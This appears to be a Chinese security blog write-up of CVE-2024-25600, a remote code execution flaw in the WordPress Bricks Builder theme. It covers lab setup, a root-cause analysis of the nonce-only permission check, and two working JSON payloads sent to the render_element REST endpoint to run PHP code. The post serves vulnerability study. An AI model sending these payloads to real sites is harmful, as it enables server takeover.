CVE-2024-25600：WordPress Bricks Builder RCE

Timeline Sec

发布于 2024-11-23 14:16:04

13700

代码可运行

文章被收录于专栏：Timeline SecTimeline Sec

运行总次数：0

代码可运行

0x01 简介

Bricks Builder 是一个 WordPress 页面构建插件，它的主要功能是让用户可以通过直观的界面和拖放操作来创建自定义的网页布局。使用 Bricks Builder，用户可以轻松地设计和定制其网站的页面，而无需编写任何代码。

0x02 漏洞概述

漏洞编号：CVE-2024-25600

WordPress配置安装的Brick Builder主题存在远程代码漏洞。攻击者可通过/wp-json/bricks/v1/render_element 接口中直接提交代码即可在目标执行任意代码，进而控制目标服务器。

0x03 影响版本

Brick Builder <= 1.9.6

0x04 环境搭建

本地搭建如下：（比较简单不详细叙述了）

下载Bricks Builder：

参考 https://www.pythonthree.com/free-download-bricks-builder/

下载WordPress下载地址：https://github.com/WordPress/WordPress/releases/tag/6.4.3

安装一个phpstudy，并启动，将下载的wordpress解压到WWW目录下

访问 http://localhost/WordPress-6.4.3/ 自动跳转到安装界面，设置数据库，在这注意要手动新建一个数据库。

安装好后登录后台，上传主题并安装启用

0x05 漏洞利用

指纹特征：body中包含/wp-content/themes/bricks/

首先需要得到 nonce，直接访问网站即可

然后就可以构造POC,执行代码了

POST /WordPress-6.4.3/wp-json/bricks/v1/render_element HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 295

{
"postId":"1",
"nonce":"69d17dbdfd",
"element":{
    "name":"container",
    "settings":{
        "hasLoop":"",
        "query":{
            "useQueryEditor":true,
            "queryEditor":"system('calc');throw new Exception();", 
            "objectType":""
        }
    }
}
}

0x06 漏洞分析

首先看下漏洞触发的具体位置，位于\wp-content\themes\bricks\includes\query.php中prepare_query_vars_from_settings函数中

这段代码被用来执行用户提交的 PHP 代码并返回执行结果，通过构造的POC，输入的代码将在这里执行。

向上分析一下，$php_query_raw参数是怎么来的

php_query_raw由bricks_render_dynamic_data( query_vars['queryEditor'], post_id );得到,bricks_render_dynamic_data函数用来执行数据渲染操作，而query_vars['queryEditor'] 是一个存储动态数据配置的数组，该数组包含了查询参数和条件。

$query_vars由传入的settings形参得来。全局搜索一下调用了 prepare_query_vars_from_settings 方法的地方

可以看到query.php的Query类构造函数（__construct）能够直接触发prepare_query_vars_from_settings，需要的条件是进入else循环中，也就是element数组中的id的值为空即可。

同时如果要想成功执行代码则还需要两个条件

1.在element参数下setting参数下的query参数下，设置参数queryEditor为我们rce代码

2.在element参数下setting参数下的query参数下，要有参数useQueryEditor

构造函数自动执行的前提是所在的类被实例化，继续搜素，看在哪里会实例化Query类

在ajax.php#render_element中存在Query的实例化，需要的条件就是loop_element为false，而其初始值为false，这里设置了ajax与rest api这两种请求方式。非ajax请求element参数下没有参数loopElement,loop_elemet 将被置为 false ，即保证POST请求中保持没有loopElement即可保持为false。

接着往下看，这里需要注意一个地方，这里它会从elements中获取name，并且通过name 获取一个类，判断这个类是否存在，如果不存在会抛出doesn't exist内容，从而导致RCE失败

在elements.php中，初始化定义了很多name的名称，理论上这些初始化定义的应该都是存在可用的，因此POC里面的name也可以是 section、block、div等

继续搜render_element的调用方法,发现在api.php中存在命名相同的方法调用了Ajax#render_element，这里的api.php实际上是一个处理注册的 REST API 端点之一的文件

继续搜索调用，找到在它的自定义初始化端点函数，从中可以看到它定义了很多能够注册的REST路由，API_NAMESPACE的值就是/bricks/v1/，通过后面拼接某个字符串的方式触发对应的callback回调函数以及权限检查。

这里的render_element_permissions_check就是检查nonce随机数，但只检查了随机数的值，但是没有检查用户的权限。

因此payload可以构造为

{
"postId":"1",
"nonce":"6e5b5ffb32",
"element":{
    "name":"div",
    "settings":{
        "hasLoop":"",
        "query":{
            "useQueryEditor":true,
            "queryEditor":"system('calc');throw new Exception();", 
            "objectType":""
        }
    }
}
}